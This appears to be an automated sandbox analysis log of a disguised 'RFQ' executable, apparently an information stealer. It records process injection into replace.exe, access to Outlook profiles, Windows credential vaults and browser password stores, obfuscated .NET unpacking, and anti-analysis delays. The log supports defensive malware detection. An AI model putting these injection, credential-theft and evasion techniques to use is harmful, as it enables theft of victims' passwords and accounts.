            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: replace.exe, 00000005.00000003.2110529013.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2175137923.0000000002B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: RFQ 0400-ENPI-RQMA.exeReversingLabs: Detection: 28%
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeFile read: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe:Zone.Identifier
            Source: unknownProcess created: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe "C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe"
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess created: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe "C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe"
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: mscoree.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: profapi.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: dwrite.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: textshaping.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: amsi.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: msasn1.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: gpapi.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: urlmon.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: iertutil.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: srvcli.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: netutils.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: propsys.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: windowscodecs.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: ulib.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: aYJw.pdb source: RFQ 0400-ENPI-RQMA.exe
            Source: Binary string: replace.pdb source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1926765955.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895608255.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000003.1866058996.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1926765955.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895608255.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000003.1866058996.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KdcHSkcpIgYD.exe, 00000004.00000000.1853172112.00000000009BE000.00000002.00000001.01000000.0000000D.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2897838287.00000000009BE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1928920536.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1926857156.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ 0400-ENPI-RQMA.exe, RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000003.1928920536.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1926857156.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: aYJw.pdbSHA256 source: RFQ 0400-ENPI-RQMA.exe

            Data Obfuscation

            Source: RFQ 0400-ENPI-RQMA.exe, Form1.cs.Net Code: InitializeComponent
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, F6hFYiiBiVNM4n0oqc.cs.Net Code: UR0T1nKqk3 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, F6hFYiiBiVNM4n0oqc.cs.Net Code: UR0T1nKqk3 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.32e5318.4.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, F6hFYiiBiVNM4n0oqc.cs.Net Code: UR0T1nKqk3 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.7ae0000.11.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: 0xECE1BD42 [Thu Dec 8 21:10:26 2095 UTC]
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_016AE460 pushfd ; retf 0_2_016AE461
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B24507 pushad ; retf 0_2_07B24508
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B244FD pushad ; retf 0_2_07B244FE
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07D8676F pushad ; retf 0_2_07D8677D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07D86847 push esp; retf 0_2_07D86855
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00416023 push ds; ret 2_2_00416071
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00404834 push ebx; ret 2_2_00404835
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0040A036 push es; ret 2_2_0040A039
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004119A0 pushfd ; iretd 2_2_004119B2
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00409A42 push ecx; ret 2_2_00409A46
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0040D276 push ebx; retf 2_2_0040D29A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0040D214 push ecx; iretd 2_2_0040D215
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00418B17 push ss; retf 2_2_00418B1B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004074E7 pushad ; iretd 2_2_004074F3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00403490 push eax; ret 2_2_00403492
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00409D5A push cs; retf 2_2_00409D5B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00406524 push es; iretd 2_2_00406530
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004145D8 pushfd ; ret 2_2_004145D9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0040CE54 push cs; iretd 2_2_0040CE5B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0139225F pushad ; ret 2_2_013927F9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013927FA pushad ; ret 2_2_013927F9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01399939 push es; iretd 2_2_01399940
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C09AD push ecx; mov dword ptr [esp], ecx2_2_013C09B6
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0139283D push eax; iretd 2_2_01392858
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0316225F pushad ; ret 5_2_031627F9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031627FA pushad ; ret 5_2_031627F9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031909AD push ecx; mov dword ptr [esp], ecx5_2_031909B6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0316283D push eax; iretd 5_2_03162858
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03161368 push eax; iretd 5_2_03161369
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: section name: .text entropy: 7.96453329112393
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack and 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, multiple .cs files: High entropy of concatenated method names
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, A8gFw3myrZdLsbB0jH.csHigh entropy of concatenated method names: 'hGoKV6pOP2', 'sDTKD6DAZl', 'D4TKsanD9P', 'SasK63Llaa', 'WFxKLVIpSQ', 'MyXKwq2vTU', 'wNyKa0NaZX', 'etEKIpeQwt', 'A0jKFCyT2p', 'TCLKSLsBAh'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, mQ0RGZYiDcvttbn8xA.csHigh entropy of concatenated method names: 'l01MfqMb0E', 'qeHMA1vonM', 'ME5MOCN54K', 'mXbMLwjK0S', 'bAvMaMexpa', 'GqfMIdE1tK', 'TaHMSNopXT', 'x88Mi2sc0L', 'xoLMVWXQC5', 'zeBMEjCkaL'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, JtfGZgjgKQWLSBqGf3.csHigh entropy of concatenated method names: 'LbfmcoYk6u', 'MV4mPPCLnY', 'P5JmYVhp03', 'la1mjB4EAP', 'xMmmUGtyGI', 'rl5YRHNysM', 'c5OYxKt6JN', 'dbGYdNW8td', 'qmtYvMqXKX', 'frYYeddTyN'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, bTPDcirfT3DGP9qfd1.csHigh entropy of concatenated method names: 'yPwYn0ZEad', 'ckJY8sQgtx', 'X2EXw7jaGY', 'yqJXaRAPmK', 'WrNXIEehvy', 'tNsXFB1nT7', 'rpmXSEgCcO', 'Xt6XiBYCTH', 'xKBXppOemy', 'AEjXVowRsU'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, MDFNbnfWwmWjgD7ikE.csHigh entropy of concatenated method names: 'EZjjbluCTR', 'rcWjrtlD8U', 'ALDj1TjIys', 'zhyjZtkuHb', 'GCQjnFDD2h', 'KUsj9EVZR5', 'c0dj8Eynfa', 'HT6jfnLUrW', 'Jk7jAleOSw', 'z0hjudJV8m'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, YoSM6Wp2IrmhKrj3ZC.csHigh entropy of concatenated method names: 'EHpkOZGoim', 'WA1kLrXTxA', 'KAwkw91x1C', 'aXAkaIv7QY', 'oyaksa6BYE', 'ClbkI8eig4', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, uVaeFkcPeaH3ocHSEv0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h3ABspXNn4', 'bprB6oEHSI', 'OOwBhWr7FM', 'qslB2At04s', 'JNlBRH3Aso', 'ylhBxsepID', 'LGOBdMLWa6'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, XIpVv9AC41Lf2l6L2Q.csHigh entropy of concatenated method names: 'buojqmtYbm', 'LlojXKNTWv', 'CUUjmU9wpL', 'idLm5VJxhU', 'p2mmzMhrcr', 'MqljNyE9lA', 'xePjJ4ybse', 'wTMj3qPZl1', 'sQxjy54DYA', 'DM0jTyba28'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, yR7kGq657qmGnh4tKL.csHigh entropy of concatenated method names: 'Dispose', 'rt7JecR04u', 'vPl3LjlNpq', 'Mya44ixB1G', 'TG4J5Nl5ID', 'ERhJzRwAix', 'ProcessDialogKey', 'ViF3NgEZAV', 'CAt3JRHo3Y', 'kbU337WtIm'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, MYD0nFMdGQovafxJ7Z.csHigh entropy of concatenated method names: 'ToString', 'TXg7ENvWeS', 'dG17LdNH2W', 'RH17wjMabu', 'gVC7ar2iUl', 'fpt7INJBos', 'k7D7FOv6Zx', 'x0G7SN6d4H', 'UfC7iXNd2H', 'JiD7p8YshM'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, F6hFYiiBiVNM4n0oqc.csHigh entropy of concatenated method names: 'w0Pyco7jh7', 'nQMyqKQ0CB', 'JU3yPigGWy', 'fK2yX0Tmbq', 'L1OyYsdiWV', 'tUcymZSjEr', 'd9KyjFcQbs', 'mYvyUcW6O4', 'z7UyGZvsFt', 'cXcyChiKNm'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, v1EZnFxqBBh6XGqBr0.csHigh entropy of concatenated method names: 'ga7JjlR6FY', 'bOqJU3jPNZ', 'HNAJC2px6b', 'exJJHlHYga', 'TLfJKV4JKO', 'hSPJ7Cx93G', 'K4CWXHXaqrx2gKV2CN', 'Kb7wV8IIRBUbVtH4nt', 'qfL18rE5SgLOYfGNeO', 'z68JJQ1JoN'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, ynG9sBnaZATAKmVTe7.csHigh entropy of concatenated method names: 'aK41hKnqs', 'gEiZ7GbsC', 'IhX9M8pPa', 'dJi8lPsuF', 'z9tAIhOVH', 'b8juMXYIt', 'jcnDVa0umTBv8BGfWG', 'aJ6Xhf27CApeSBSRRh', 'NL2kZUIWP', 'I7yBpceb2'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, bcqsqkytaUAL9e8ErJ.csHigh entropy of concatenated method names: 'SXkoJ5XlMN', 'CPMoyaxOBX', 'tBUoT5y3q9', 'yV6oqWBaS5', 'VG7oPi6Z88', 'ElPoYlRwDR', 'xHDomnhDYP', 'BTBkdRC1EA', 'AMrkv5qsnA', 'xUJket4wiQ'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, rDIp5G8onoljg2aKqn.csHigh entropy of concatenated method names: 'GyEPsNGmbc', 'AeKP60Dcmb', 'fIQPhkuffT', 'r8kP2QiRoi', 'IFOPRb9hr3', 'i8KPx6pawM', 'ab2PdaQLtM', 'uPrPvfrUkR', 'PEePey8bVA', 'yFhP5KOi9N'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, KJLWMFUAwl9EjQ3Nxn.csHigh entropy of concatenated method names: 'pPZkqFnMuO', 'gKtkPlZJyb', 'fyOkX3Ypin', 'WMOkYIcsRd', 'uD3km0phmX', 'srRkjXBgAq', 'dIKkUuJ25Y', 'TWtkGqLEyw', 'VASkCJDl12', 'IhCkHVp5fj'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, ySKAX7gAV1CMZRPs6r.csHigh entropy of concatenated method names: 'uTOXZij8dh', 'r4qX9kwnlq', 'MVWXfxGigI', 'RWUXAwx6wh', 'UvyXKw7iD5', 'fShX7Z91Y4', 'WdBXtLkiQ6', 'dD3XkrQfFf', 'u7yXoaEKFj', 'VR7XBOUxXb'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, QSK4KUc4JILpZ3IpyRw.csHigh entropy of concatenated method names: 'VpqobrK9uA', 'rlVorSeCXt', 'G2oo1iR30C', 'NwRoZvZKd9', 'nCkonvFPUF', 'iYPo9ytsxA', 'kEco8oBvIe', 'ENGofls0qS', 'VPioAKXnss', 'gDvouoKYhp'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, uXWt4EzWmqvJcLS2dM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uiloM7MHuq', 'HRwoKmJojI', 'XHpo7RKDXT', 'x7Cot2jC8d', 'TRsokBIMEX', 'eG3oonQSXG', 'rLuoB7c2V9'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, grvkySDx2bMBUo2s1j.csHigh entropy of concatenated method names: 'Ii0tvRG7t9', 'KZft53SoFD', 'mJrkN6mqCr', 'APEkJDAwXq', 'vTOtEF0RNb', 't2rtDwfmRs', 'lSAtl1Vn71', 'oRIts0p6aB', 'NGbt6cqQcm', 's3AthSjkI6'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, GJJWFJkvd2VZBSbtjl.csHigh entropy of concatenated method names: 'jn8tCKY4Ck', 'EpitHys6B7', 'ToString', 'S40tqJnNbW', 'WettPrSuU5', 'Pa5tXD9rQB', 'mwitYiioBl', 'RnXtmwNDum', 'FTrtjtw5W8', 'd0ltU7gMUm'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, A8gFw3myrZdLsbB0jH.csHigh entropy of concatenated method names: 'hGoKV6pOP2', 'sDTKD6DAZl', 'D4TKsanD9P', 'SasK63Llaa', 'WFxKLVIpSQ', 'MyXKwq2vTU', 'wNyKa0NaZX', 'etEKIpeQwt', 'A0jKFCyT2p', 'TCLKSLsBAh'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, mQ0RGZYiDcvttbn8xA.csHigh entropy of concatenated method names: 'l01MfqMb0E', 'qeHMA1vonM', 'ME5MOCN54K', 'mXbMLwjK0S', 'bAvMaMexpa', 'GqfMIdE1tK', 'TaHMSNopXT', 'x88Mi2sc0L', 'xoLMVWXQC5', 'zeBMEjCkaL'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, JtfGZgjgKQWLSBqGf3.csHigh entropy of concatenated method names: 'LbfmcoYk6u', 'MV4mPPCLnY', 'P5JmYVhp03', 'la1mjB4EAP', 'xMmmUGtyGI', 'rl5YRHNysM', 'c5OYxKt6JN', 'dbGYdNW8td', 'qmtYvMqXKX', 'frYYeddTyN'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, bTPDcirfT3DGP9qfd1.csHigh entropy of concatenated method names: 'yPwYn0ZEad', 'ckJY8sQgtx', 'X2EXw7jaGY', 'yqJXaRAPmK', 'WrNXIEehvy', 'tNsXFB1nT7', 'rpmXSEgCcO', 'Xt6XiBYCTH', 'xKBXppOemy', 'AEjXVowRsU'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, MDFNbnfWwmWjgD7ikE.csHigh entropy of concatenated method names: 'EZjjbluCTR', 'rcWjrtlD8U', 'ALDj1TjIys', 'zhyjZtkuHb', 'GCQjnFDD2h', 'KUsj9EVZR5', 'c0dj8Eynfa', 'HT6jfnLUrW', 'Jk7jAleOSw', 'z0hjudJV8m'
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: RFQ 0400-ENPI-RQMA.exe PID: 7300, type: MEMORYSTR
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Memory allocated: 16A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Memory allocated: 32C0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Memory allocated: 31D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Memory allocated: 9130000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Memory allocated: A130000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Memory allocated: A330000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Memory allocated: B330000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Memory allocated: B720000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Memory allocated: C720000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Memory allocated: D720000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_0143D1C0 rdtsc 2_2_0143D1C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe API coverage: 0.8 %
            Source: C:\Windows\SysWOW64\replace.exe API coverage: 1.5 %
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe TID: 7320 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe TID: 8056 Thread sleep time: -70000s >= -30000s
            Source: C:\Windows\SysWOW64\replace.exe Last function: Thread delayed
            Source: KdcHSkcpIgYD.exe, 00000008.00000002.2897904330.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
            Source: replace.exe, 00000005.00000002.2175137923.0000000002B20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Process information queried: ProcessInformation
